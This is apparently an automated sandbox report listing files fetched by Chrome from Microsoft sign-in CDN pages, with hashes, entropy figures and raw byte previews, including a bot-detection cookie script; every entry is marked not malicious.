                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                      Category:downloaded
                                                                                      Size (bytes):673
                                                                                      Entropy (8bit):7.6596900876595075
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                      MD5:0E176276362B94279A4492511BFCBD98
                                                                                      SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                      SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                      SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                      Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                                      Category:dropped
                                                                                      Size (bytes):2672
                                                                                      Entropy (8bit):6.640973516071413
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                      MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                      SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                      SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                      SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                      Category:downloaded
                                                                                      Size (bytes):673
                                                                                      Entropy (8bit):7.6596900876595075
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                      MD5:0E176276362B94279A4492511BFCBD98
                                                                                      SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                      SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                      SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://logincdn.msauth.net/shared/5/images/2_bc3d32a696895f78c19d.svg
                                                                                      Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                                      Category:dropped
                                                                                      Size (bytes):49954
                                                                                      Entropy (8bit):7.99493321471063
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                                      MD5:E16AC075AC754DBD1CF969508220E30D
                                                                                      SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                                      SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                                      SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                      Category:downloaded
                                                                                      Size (bytes):20410
                                                                                      Entropy (8bit):7.980582012022051
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                      MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                      SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                      SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                      SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                      Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                                      Category:downloaded
                                                                                      Size (bytes):2672
                                                                                      Entropy (8bit):6.640973516071413
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                      MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                      SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                      SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                      SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                      Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (918)
                                                                                      Category:downloaded
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.4604704891374
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hY/LLuvW9BokgrY7cMdhwCBie46Tz1QqIJIzcq9X5wXR5viRX4j:bCo5Y73hwCd4olUItp5wrNj
                                                                                      MD5:5DC258F6742F6D22A4CD80F50926ED70
                                                                                      SHA1:2925F965C31990E0F883E2E885A3D57056168DCC
                                                                                      SHA-256:3B8D3C93FD78C24F4C175C8515E4A5DF79AEE536AF4CED58BA078EA591569EAC
                                                                                      SHA-512:BB63B3078587A823CCBB2314EFF3CCC16B20A01AC717CE37289DA8B5118E5053F867CE62256CC1C9466A7E2CBF60C854F4DEA68A060D67CC51BAAB17179E140C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://msft.hsprotect.net/index.html
                                                                                      Preview:<!DOCTYPE html>.<html lang='en'>.<head>. <meta charset='UTF-8'>. <meta name='viewport' content='width=device-width, initial-scale=1.0'>. <title>Human Sensor Script Iframe</title>.</head>.<body>.<script>. var a=["_pxvid","_px3","_pxde"];function b(a){var b=new RegExp("(^| )"+a+"=([^;]+)"),c=document.cookie.match(b);return c?c[2]:null}function c(a,b,c){window.parent.postMessage({type:"cookie",name:a,value:b,expires:c||new Date(Date.now()+31536e6).toUTCString()},"*")}function d(a){var b=/^([^=]+)=([^;]*)/,c=/expires=([^;]+)/,d=a.match(b),e=d?d[1]:null,f=d?d[2]:null,g=a.match(c),h=g?g[1]:null;return{cookieName:e,cookieValue:f,expires:h}}function e(b){var e=d(b);-1!==a.indexOf(e.cookieName)&&c(e.cookieName,e.cookieValue,e.expires)}function f(){try{var a=Object.getOwnPropertyDescriptor(Document.prototype,"cookie")||Object.getOwnPropertyDescriptor(Object.getPrototypeOf(document),"cookie"),b=a.get.bind(document),c=a.set.bind(document);Object.defineProperty(document,"cookie",{get:fu
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                      Category:dropped
                                                                                      Size (bytes):5525
                                                                                      Entropy (8bit):7.961202222662501
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                      MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                      SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                      SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                      SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:1
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                      Category:downloaded
                                                                                      Size (bytes):35170
                                                                                      Entropy (8bit):7.993096534744333
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                      MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                      SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                      SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                      SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                      Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                      Category:downloaded
                                                                                      Size (bytes):16345
                                                                                      Entropy (8bit):7.98960525258912
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                      MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                      SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                      SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                      SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                      Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90677
                                                                                      Category:dropped
                                                                                      Size (bytes):32811
                                                                                      Entropy (8bit):7.992877953733209
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:fDPYSdMWwCyzH8REcKPN/8p0x7UQzlRMXv1FevViDAqA:a8REcsUp0xUQzc/8VCAV
                                                                                      MD5:2E287EB418940084B921590C6E672C9E
                                                                                      SHA1:1FC75A9DAA054EF88AAEA181F3A9B4CBA2B6B6E1
                                                                                      SHA-256:6C2C58DAAE76131A00D1BFEE20852F372CF594BE7F4A8848ACC42F8BF72C1BBD
                                                                                      SHA-512:A77F69571B0F04F4A2354D9E18E41EF86F22274EAED20C02215B632BFEF09C6543A83591E9DB3F2B4036A9684BFF666EB6A7B253BA18893500E9CD541AB752A0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........iw.8.?.~>....%."9K'R...q:.fw.,.n_.Z.l.eRMR^b.O...A.N...yq.t,b!.....BU....4kM.Lr..I.]DE.&..TF..K.J.9.7.$....(..'?....f...tG...?y8~0..;..w;[....;.u........D.......N:W.d........E..eR...q..sJG.O.Z,....l......~.........'.d.......n.N..@.../....l'...".J3Y..n3Y...o..T...P0..j..-.....v.m7T.LM. .....Ev.7...IC.q..[.t>nj.e..OE<m...l)^.K.......8:M.&.]zz*..j.X..K........'3..Tk....Z.2.GQ6..Fi._.|v.Bf.W?...T.]:j(.%F.)..t_^........8.:..DN..8....B.>|<..~..|H.x.q.=-.f.~..{.z..&t...e.LfE,.;.d...n.....2..FH. .Y,.J...EC.cj. .F......o.....\...&\.J..fJiJ.S..4.5..NM]m.....Q.....e.O..iSs'........'Z..6A(Y.8..eQ.....2..I.?...;dS..I...D..@./7t.:z.......c...dF..B.......9...8)..h.........<.I...2.\FY+.=S.8...$Qv...<..IL.x".w9_..3.."-nfR.(..WDN..L.....z..I8.E..Ub......d..M.....sq.N........p.*.lX...A]3Y....j...%.`N..G.v..6.m.KH.M......Z..a2.N.....4....,u.O.vWM...=d..J.r`..b.....N.hzp..C..?.. ......:..M6............;.w.."B.^.ZP.N.:.[..(:...(.y.)q...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 4730
                                                                                      Category:downloaded
                                                                                      Size (bytes):1665
                                                                                      Entropy (8bit):7.865599708484188
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:XyBkuFl+zM1O5UGTtXFpgBY6rUheWMwEX6uIuL4DpvlZndrTCs:CBPIMGUG2BraMd74DptTrus
                                                                                      MD5:7F8CFCD63635E2332715FA8A476A9106
                                                                                      SHA1:BC6250B209D55688BCFBB45A5CFB935ED51C4A95
                                                                                      SHA-256:00D524C1675CF218207723DD22BDC884FB7E0AD30BB555D6FCDEA4D828771E70
                                                                                      SHA-512:EEA2C815E30B1729B02BED41800D4002D176A4FA84157FE50BFB0EBFAB40F57C3D380D1956CAA317B3F18B0A4555AAF067E446D15D584D5FE4A4D036389DC9BF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_presetpasswordsplitter_3ca848e05d76b2c07f9b.js
                                                                                      Preview:...........W[o.6.~.`...$.r.[.h.tI.4F.u....(.f"..I.......c9N....a.b..|...R..[..k...u{..{....]......}......qj.{c..E..3...Hp$$b.....5U(.O.p..R.H.)J...D+.1.A).......!.`.g.S..>.kl.8h.....X#.4#.a.Zk.......T..1:gD.%..IJ(.....z....HQ..B......F2.....Ge.....`ph..O....1I!h.#x4.W@,...E.H.4.i..1..G...+..?...aJ._.SQ91.......&K...% ....I.M.swP8<...k..G.j0C,N....ETi.$42...LQ?o..n..u.F.R.Z...{^.V^l..NT.R.1=N......t.a...-..V>v/>{7j..i..... @."..:..?+d..g.......7,?N>..(;.=*.JS.C.)..Ln?B..........j\..j._..{.fk.rb.*i...|?...6+...G..bx.]..j.2.l....c..]..or[(,.%.6.wY[..k.1....~*.s./..t.+5....f......w.L...F.m..I.Y..K.2 ...+<..1p(4......s..Qm.K.|.n..R....~..r..[.W.~G....*..X......s.%n.1._$....tx"8.I....p..D.J...j/.r.)`..mo.....<.EH.V.j....[...B.g.....Ak+......Ar...!..@)..wF.h...A..4J.....].'..VF....."... .'w..*..Uu^v....f.j.sw.........8D.4..b<...@z..`BD....? {$ A.......=.j...f.Z.V................:..7........B<l4......jb|AA.....5....g..Lm..m...H....l.X.^t.).0..D`....
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                      Category:dropped
                                                                                      Size (bytes):673
                                                                                      Entropy (8bit):7.6596900876595075
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                      MD5:0E176276362B94279A4492511BFCBD98
                                                                                      SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                      SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                      SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                                      Category:downloaded
                                                                                      Size (bytes):3620
                                                                                      Entropy (8bit):6.867828878374734
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                      MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                      SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                      SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
